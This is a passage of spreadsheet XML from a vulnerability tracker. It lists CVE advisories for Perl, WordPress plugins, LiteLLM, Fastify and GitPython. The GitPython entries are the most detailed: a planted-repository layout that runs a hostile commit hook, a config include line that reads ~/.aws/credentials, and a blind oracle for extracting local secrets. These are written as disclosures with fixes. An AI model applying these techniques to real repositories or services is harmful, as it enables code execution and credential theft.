The matches, first_match and match_details methods use the T_STD_STRING typemap to translate Perl scalars (SVs) into strings via the std::string constructor, using the SvPV macro to stringify the haystack input, and the SvCUR macro to determine the length of the SV.
When the input SVs are references, integers (IVs) or floats (NVs), the SvCUR macro will return an invalid length if it is run before the input is stringified, leading to an out-of-bounds read which can abort the process.
Note that the evaluation order of arguments to std::string is unspecified. Depending on the compiler, SvCUR may be run first and lead to an abort that cannot be caught within Perl.
This can be triggered when the haystack is a numeric value, for example,
    my $ac = Algorithm::AhoCorasick::XS-&gt;new( [ "11", "22" ] );
    $ac-&gt;matches( 211 );
This can occur when the haystack is the result of reading data from decoded JSON or a numeric database column. It can also be triggered when using a blessed object as a haystack.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80490</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81739</t>
        </is>
      </c>
      <c r="D631" s="5" t="inlineStr"/>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="inlineStr"/>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr"/>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>The Paytm Payment Gateway WordPress plugin before 2.8.9 does not sanitize and escape data it stores from payment callbacks before outputting it in an admin page, and the integrity check on those callbacks can be forged when the gateway is enabled without credentials, allowing unauthenticated users to store scripts that will run in the session of a store administrator.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81739</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81809</t>
        </is>
      </c>
      <c r="D632" s="5" t="inlineStr"/>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="inlineStr"/>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr"/>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>The Paytm Payment Gateway WordPress plugin before 2.8.9 does not properly escape data taken from payment callbacks before using it in a SQL statement, and the integrity check on those callbacks can be forged when the gateway is enabled without credentials, allowing unauthenticated users to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81809</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84377</t>
        </is>
      </c>
      <c r="D633" s="5" t="inlineStr"/>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr">
        <is>
          <t>PyPI:litellm</t>
        </is>
      </c>
      <c r="M633" s="5" t="inlineStr">
        <is>
          <t>1.88.6, 1.89.7, 1.90.7, 1.91.5, 1.92.2, 1.93.2</t>
        </is>
      </c>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr"/>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>### Impact
Any authenticated LiteLLM proxy user could redirect an outbound provider call to a destination they control and cause the proxy to send its own configured provider credentials to that destination. The proxy's request-body validation was a denylist that did not cover every sensitive parameter and did not inspect parameters nested inside other request fields, so a caller could supply a routing or credential value that the proxy applied without clearing the operator's stored key. Any authenticated user could therefore exfiltrate the operator's upstream provider credentials and other configured secrets, and perform Server-Side Request Forgery against internal services reachable from the proxy.
### Patches
Fixed in 1.96.2, 1.95.1, 1.94.3, 1.93.2, 1.92.2, 1.91.5, 1.90.7, 1.89.7, and 1.88.6.
### Workarounds
Set `general_settings.allow_client_side_credentials` to `false` so callers cannot override connection parameters, restrict proxy keys to trusted callers, and block the affected parameters (`api_base`, `base_url`, `model_list`, `fallbacks`, provider credential fields) at a reverse proxy or API gateway.</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84377</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84428</t>
        </is>
      </c>
      <c r="D634" s="5" t="inlineStr"/>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M634" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr"/>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify lowercases header-schema property names before compiling the schema, because Node.js stores request header names in lowercase. That normalization was incomplete: it lowercased only top-level `properties` keys and the root `required` array, and did not lowercase the JSON Schema Draft 7 `dependencies` keyword (its trigger keys and dependent property names) or names in nested subschemas. As a result, a header schema that uses `dependencies` to require one header when another is present (for example `X-Admin` requiring `X-Admin-Token`) never matches the lowercased request headers, so the dependency assertion is silently skipped. An unauthenticated remote client can send the header that activates a privileged path while omitting the header the dependency was meant to require, bypassing a schema-enforced security control. The header schema is idiomatic, valid JSON Schema Draft 7, and no custom validator, malformed request, or misconfiguration is required.
### Patches
Header-schema names are now normalized across all schema positions (`properties`, `required`, `dependencies`, `dependentRequired`, `dependentSchemas`, and nested subschemas). Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release. Header schemas referenced through an external shared `$ref` (registered with `addSchema`) are not reached by this normalization and now emit an `FSTSEC002` startup warning; inline the header schema to keep case-insensitive assertions in effect.
### Workarounds
If upgrading is not immediately possible, write header-schema names in lowercase so the `dependencies` and other case-sensitive assertions match Node's lowercased request headers, or enforce the cross-header requirement in an `onRequest` or `preValidation` hook instead of the schema.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84428</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="D635" s="5" t="inlineStr"/>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M635" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr"/>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify decided whether to validate a request part by checking its schema for JavaScript truthiness. JSON Schema Draft 7 defines the boolean `false` as a valid schema that rejects every instance, but because `false` is falsy, a route that set `body`, `querystring`, `params`, or `headers` to `false` had that part left uncompiled: no validator was attached and the request reached the handler. An application that used `false` as a deny-all schema to make a route unreachable was therefore fully bypassed, and an unauthenticated remote client could reach the handler with any input. The same applied to the documented `query` alias for `querystring`. This is a complete bypass rather than a weak-schema issue, since `false` is the strongest JSON Schema assertion and must always fail.
### Patches
Request-part schemas are now selected by an explicit presence check rather than truthiness, so a boolean `false` (or `true`) schema is compiled and enforced, including through the `query` alias. Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release.
### Workarounds
If upgrading is not immediately possible, express a deny-all request schema with an always-failing object schema instead of the boolean `false` (for example `{ "not": {} }`), or reject the request in an `onRequest` hook.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84504</t>
        </is>
      </c>
      <c r="D636" s="5" t="inlineStr"/>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M636" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr"/>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify runs a route's validator and, for a result shaped like `{ value, error }`, unwraps it: an `error` becomes a validation failure and `value` replaces the request part. This convention is intended for synchronous custom compilers (for example Joi). A JSON Schema `$async` validator, however, resolves with the validated data itself, so Fastify applied the same unwrapping to it. If a request part validated by an `$async` schema contains a `value` property, Fastify replaced the whole request part with that nested value before the handler ran, so a `value` or `error` property in the payload was attacker-controlled. An application that dispatches operations from the validated request body could then act on data that never satisfied the route schema, leading to unauthorized state changes or disclosure. Reaching the vulnerable path requires the route to use an `$async` request schema.
### Patches
Fastify no longer treats an asynchronous validation result as a `{ value, error }` wrapper: an async validator's resolved value is used only to determine pass or fail, and it can no longer replace the request part or inject an error. The synchronous custom-compiler contract is unchanged. Patched in fastify `5.12.2` and `6.0.0`.
### Workarounds
If upgrading is not immediately possible, avoid `$async` request schemas, or perform the security-sensitive check in an `onRequest` or `preHandler` hook rather than relying on the schema-validated request part. Custom async validator compilers should signal failure by throwing (rejecting) rather than returning an `{ error }` object.</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84504</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86610</t>
        </is>
      </c>
      <c r="D637" s="5" t="inlineStr"/>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="inlineStr"/>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr"/>
      <c r="S637" s="5" t="inlineStr">
        <is>
          <t>The Download Manager WordPress plugin before 3.3.71 does not sufficiently sanitise and escape a package setting before outputting it back in a page, which could allow users with the Author role and above to perform Stored Cross-Site Scripting attacks against any visitor who opens the package's download dialogue, including administrators. Only sites running PHP below 8.1 are affected, as the sanitisation applied when the setting is saved does not neutralise single quotes there.</t>
        </is>
      </c>
      <c r="T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86610</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D638" s="5" t="inlineStr"/>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M638" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr"/>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>### Summary
`Repo.__init__` decides which directory is the git directory by testing candidate paths in an order that
considers the real `.git` **last**. Two earlier tests can be satisfied by ordinary tracked files. Git
reserves only the literal name `.git`, so `HEAD`, `objects/`, `refs/`, `config`, `gitdir`, `commondir`
and `hooks/` at a repository root are all legal tracked content.
Consequently, after a victim opens or clones an attacker's repository, GitPython resolves `git_dir` to
the **working-tree root** while real git correctly resolves `&lt;root&gt;/.git`. Everything GitPython then
treats as "inside the git directory" is attacker-authored content — including `hooks/`, which it
executes.
### CVE-2026-87817
### Affected code (3.1.59)
The discovery loop in `git/repo/base.py` tests, in order:
1. `git/repo/base.py:299` — `isfile(curpath/gitdir)` **and** `isfile(curpath/commondir)` **and** `isfile(curpath/HEAD)`
2. `git/repo/base.py:320` — `is_git_dir(curpath)`
3. `git/repo/base.py:341` — `dotgit = osp.join(curpath, ".git")` ← the real git dir, considered last
`is_git_dir` (`git/repo/fun.py:60`) requires only that `objects/` and `refs/` are directories and that
`HEAD` is a file; **`HEAD`'s contents are never parsed.** The hook path is resolved from
`index.repo.git_dir` (`git/index/fun.py:73`), i.e. the mis-resolved directory.
### Proof of concept
Requires only `pip install GitPython==3.1.59`. Full script attached as `poc1_rce.py`; it runs entirely
in a temp directory and the payload only writes a marker file.
Attacker repository — four ordinary tracked files at the root:
| path | mode | content |
|---|---|---|
| `gitdir` | 100644 | `.git\n` |
| `commondir` | 100644 | `.git\n` |
| `HEAD` | 100644 | `ref: refs/heads/master\n` |
| `hooks/pre-commit` | **100755** | `#!/bin/sh` + payload |
Victim — two ordinary calls:
```python
repo = git.Repo.clone_from(url, dst)     # or git.Repo(dst)
repo.index.commit("automated commit")    # code execution happens here
```
Observed on the PyPI release 3.1.59 (Linux and Windows):
```
real git says the git dir is : /tmp/.../victim/.git
GitPython says it is         : /tmp/.../victim      &lt;- shadowed
attacker's hook executed     : True
git fsck                     : (clean)
```
The `pre-commit` hook runs at `git/index/base.py:1201`, before `write_tree()`, so it fires even though
the commit later fails.
### Impact
A service that opens or clones an untrusted repository with GitPython — a CI runner building a fork
pull request, a code-scanning/SBOM service, a mirror, a dependency bot, an AI code-review/agent tool —
can be made to:
1. **Execute arbitrary commands** via the tracked `&lt;root&gt;/hooks/pre-commit` when the victim calls
   `index.commit()`.
2. **Read files outside the repository**: the tracked `&lt;root&gt;/config` becomes the repository config and
   is parsed with `merge_includes=True` (`git/repo/base.py:765`), so `[include] path = ~/.aws/credentials`
   discloses the file. (`Repo._config_reader` still defaults `merge_includes=True`, so the hardening
   added in 3.1.59 for `.gitmodules`/GHSA-7833 does not cover this path.)
3. **Write a config file to an attacker-chosen directory** via an absolute tracked `commondir`.
Delivery is silent: `git clone` exits 0, `git fsck` (including `--strict`, and with
`transfer.fsckObjects`/`fetch.fsckObjects=true`) reports nothing, and the clone passes every read-only
probe (`head.commit`, `branches`, `is_dirty()`, `untracked_files`, `iter_commits`) because a tracked
`commondir` of `.git` pins `common_dir` to the real `.git`.
### Threat model / preconditions
- Attacker controls the content of a repository the victim opens or clones with GitPython (public repo,
  fork PR, mirrored dependency).
- For code execution, the victim performs a commit via GitPython's native `index.commit()`. For the
  file-read impact, opening the repo and reading config is enough.
- `GIT_WORK_TREE` is **not** a mitigation — `git_dir` is assigned and the discovery loop breaks before
  the environment is consulted.
- Real git is unaffected; only GitPython mis-resolves the directory.
### Remediation
1. Test `curpath/.git` **before** the `gitdir`/`commondir`/`HEAD` triple and before `is_git_dir(curpath)`.
2. Resolve `hook_path` / `_commit_hook_path` / `_get_validated_reflog_path` through `repo.common_dir`.
3. Containment-check `commondir`/`gitdir` contents before joining (reuse
   `SymbolicReference._get_validated_path`).
4. Validate `HEAD` in `is_git_dir` (require `ref: refs/...` or a 40-hex sha).
5. Pass `merge_includes=False` in `Repo._config_reader` (`git/repo/base.py:765`).
### Note for the maintainers
Commit `406b98e1` (2026-05-31, "respect core.hooksPath for commit hooks") resolved the hook path via
`git rev-parse --git-path`, which is immune because git rediscovers the true `.git`. Commit `9bc287a2`
(2026-07-20) reverted it to avoid an unconditional `rev-parse` dependency — reintroducing the exec step.
Measured at each commit with the healthy-looking layout: `406b98e1` → hook did not fire; `9bc287a2` …
`3.1.59` → hook fired.
### Scope note
Only the **repository-root** case is reported: where a real `.git` exists, git prefers it, and GitPython
does not. A fake git dir in a subdirectory fools real git too, so that variant is out of scope as a
general ecosystem hazard rather than a GitPython defect.
###POC Files :
[poc1_rce.py](https://github.com/user-attachments/files/31388464/poc1_rce.py)
[poc2_file_read.py](https://github.com/user-attachments/files/31388465/poc2_file_read.py)</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D639" s="5" t="inlineStr"/>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M639" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr"/>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython 3.1.59 blocks a previously available local-file read path through unsafe git diff options such as -O/--orderfile.
However, the high-level diff API still permits --no-index with the default allow_unsafe_options=False.
--no-index changes the semantics of the paths arguments: instead of repository-relative pathspecs, Git interprets them as arbitrary filesystem paths.
When combined with the still-allowed -I/--ignore-matching-lines option, this creates a content-dependent Boolean oracle over a caller-selected local file.
This was reproduced against the published GitPython 3.1.59 wheel.
The original unsafe-option path is blocked in 3.1.59, while this alternate path remains reachable without setting allow_unsafe_options=True.
### Details
Confirmed API surface:
repo.index.diff(
    None,
    no_index=True,
    I=pattern,
    paths=[baseline_path, target_path],
    create_patch=True,
)
The relevant behavior is:
1. --no-index makes the two values supplied via paths filesystem operands rather than repository pathspecs.
2. -I/--ignore-matching-lines makes Git's result depend on whether the supplied regular expression matches the relevant file content.
3. GitPython exposes the resulting bit through distinguishable behavior:
   - matching condition: normal return with an empty DiffIndex
   - non-matching condition: GitCommandError with exit status 1
An application that forwards attacker-influenced diff options and paths and exposes the success/error distinction can therefore be queried repeatedly to recover a guessable local single-line secret.
The issue was confirmed with the default allow_unsafe_options=False.
The behavior does not require the caller to explicitly opt into GitPython's unsafe-option mode.
Verified intended security boundary:
- GitPython 3.1.58 accepts the earlier -O/--orderfile local-file input path.
- GitPython 3.1.59 rejects that same path with UnsafeOptionError.
- GitPython 3.1.59 still permits the --no-index alternate path described above.
This appears to be an alternate route to the same local-file confidentiality property that the 3.1.59 diff option hardening is intended to protect.
### PoC
A minimal reproducer, controlled extraction demonstrator, proof matrix, and proposed remediation are included in the attached package.
[gitpython-3159-maintainer-evidence.zip](https://github.com/user-attachments/files/31123571/gitpython-3159-maintainer-evidence.zip)
The minimal reproducer creates only temporary researcher-controlled files and demonstrates the following predicate:
correct prefix   -&gt; normal GitPython return
incorrect prefix -&gt; GitCommandError(status=1)
In the controlled extraction test, I generated three independent random single-line values and recovered all three exactly through repeated calls to the GitPython high-level API.
Result: 3/3 recovered.
The extraction harness also installs a Python audit hook that rejects direct Python open() access to the target file during the oracle phase. The content-dependent read is therefore performed by the child git process invoked through GitPython rather than by the reproduction script directly.
Controls were also tested:
- normal repository-scoped diff: no secret disclosure
- same outside paths without --no-index: no arbitrary-filesystem interpretation
- deliberately incorrect predicate: status 1 as expected
Suggested remediation is to classify --no-index as unsafe for the high-level diff API unless the caller explicitly sets allow_unsafe_options=True.
### Impact
Potential impact is disclosure of local files readable by the process running GitPython.
Exploitation requires an embedding application to allow an attacker to influence:
1. the relevant diff options,
2. both path operands, and
3. repeated requests while exposing a distinguishable success/error result.
The demonstrated attack is a blind content oracle rather than a one-request in-band file read. It is particularly applicable to short or structured single-line secrets where the target path and approximate value format are known or guessable.
Confirmed affected release: GitPython 3.1.59.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D640" s="5" t="inlineStr"/>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M640" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr"/>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython's `Actor.name_email_regex` regular expression (`git/util.py`, line 863)
is vulnerable to catastrophic backtracking (ReDoS — Regular Expression Denial of
Service). When GitPython parses the `author` or `committer` header of a git commit
object that contains a long string with an unterminated `&lt;` (no matching `&gt;`), the
Python regex engine enters quadratic backtracking, causing complete single-threaded
CPU exhaustion proportional to the square of the input length.
A single crafted commit object can block any GitPython API call that reads
`.author` or `.committer` for **over two minutes per invocation**, enabling denial
of service against CI runners, code-hosting backends, repository-scanning
pipelines, or any service that processes commits from third-party or untrusted
repositories.
---
### Details
**Vulnerable file and line:**
`git/util.py`, line 863:
```python
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
```
This regex is evaluated inside `Actor._from_string()` (line 909) every time
GitPython resolves a commit's `.author` or `.committer` property.
**Full call chain — from public API to vulnerable sink:**
commit.author # any ordinary GitPython API call
└── git/objects/commit.py:917
Commit._deserialize()
└── git/objects/util.py:341
parse_actor_and_date(author_line)
└── git/util.py:909
Actor._from_string(string)
